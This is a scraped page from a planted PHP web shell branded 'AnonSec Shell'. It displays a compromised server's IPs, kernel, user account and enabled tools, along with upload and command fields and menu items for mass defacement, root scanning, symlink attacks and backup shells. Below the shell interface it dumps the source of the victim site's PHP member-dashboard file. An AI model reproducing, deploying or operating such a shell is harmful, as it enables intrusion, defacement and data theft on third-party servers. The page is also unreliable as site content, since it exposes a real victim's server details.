AnonSec Shell
Server IP : 172.67.216.113  /  Your IP : 172.71.28.145   [ Reverse IP ]
Web Server : Apache
System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64
User : cp648411 ( 1354)
PHP Version : 7.2.34
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home2/cp648411/public_html/simded.com/mybackend/member/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home2/cp648411/public_html/simded.com/mybackend/member/list.php
<?php require_once("../include/class.php");?>
<?php require_once("../include/header.php");?>
<?php require_once("../include/nav_top.php");?>
<?php require_once("../include/sidebar.php");?>


<div id="main-content">
  <div class="container-fluid">
  
    <ul class="breadcrumb">
      <li><a href="../member/list.php">member</a><span class="divider">&raquo;</span></li>
      <li class="active">Dashboard</li>
    </ul>
	<?php
    $list_m1 = array('table'=>'shop','where'=>'activate = 0','count'=>'COUNT(id) AS numid');				  
    $view_m1 = $view_db->view($list_m1);
    $row_m1 = $view_db->q($view_m1);
    
    $list_m2 = array('table'=>'professor','where'=>'activate = 0','count'=>'COUNT(id) AS numid');				  
    $view_m2 = $view_db->view($list_m2);
    $row_m2 = $view_db->q($view_m2);
    
    $coun_m = $row_m1['numid'] + $row_m2['numid'];
    ?>
    <div class="dashboard-widget">
      <div class="row-fluid">

        <div class="span2">
          <div class="dashboard-wid-wrap">
            <div class="dashboard-wid-content"> <a href="../m-member/list.php"> <i class="dashboard-icons image_2_blk"></i> 
            	<span class="dasboard-icon-title">สมาชิกทั่วไป </span> </a> 
             </div>
          </div>
        </div>
        
        <div class="span2">
          <div class="dashboard-wid-wrap">
            <div class="dashboard-wid-content"> <a href="../m-shop/list.php"> <i class="dashboard-icons image_2_blk"></i> 
            	<span class="dasboard-icon-title">ร้านค้า <?php if( $row_m1['numid'] > 0){  ?><span class="alert-noty"><?php echo $row_m1['numid']; ?></span><?php  }?></span> </a> 
             </div>
          </div>
        </div>
        
        <div class="span2">
          <div class="dashboard-wid-wrap">
            <div class="dashboard-wid-content"> <a href="../m-professor/list.php"> <i class="dashboard-icons image_2_blk"></i> 
            	<span class="dasboard-icon-title">หมอดู <?php if( $row_m2['numid'] > 0){  ?><span class="alert-noty"><?php echo $row_m2['numid']; ?></span><?php  }?></span> </a> 
             </div>
          </div>
        </div>
        
    </div>
   </div>
  </div>
</div>

<?php require_once("../include/footer_js.php");?>
<?php require_once("../include/footer.php");?>

Anon7 - 2022
AnonSec Team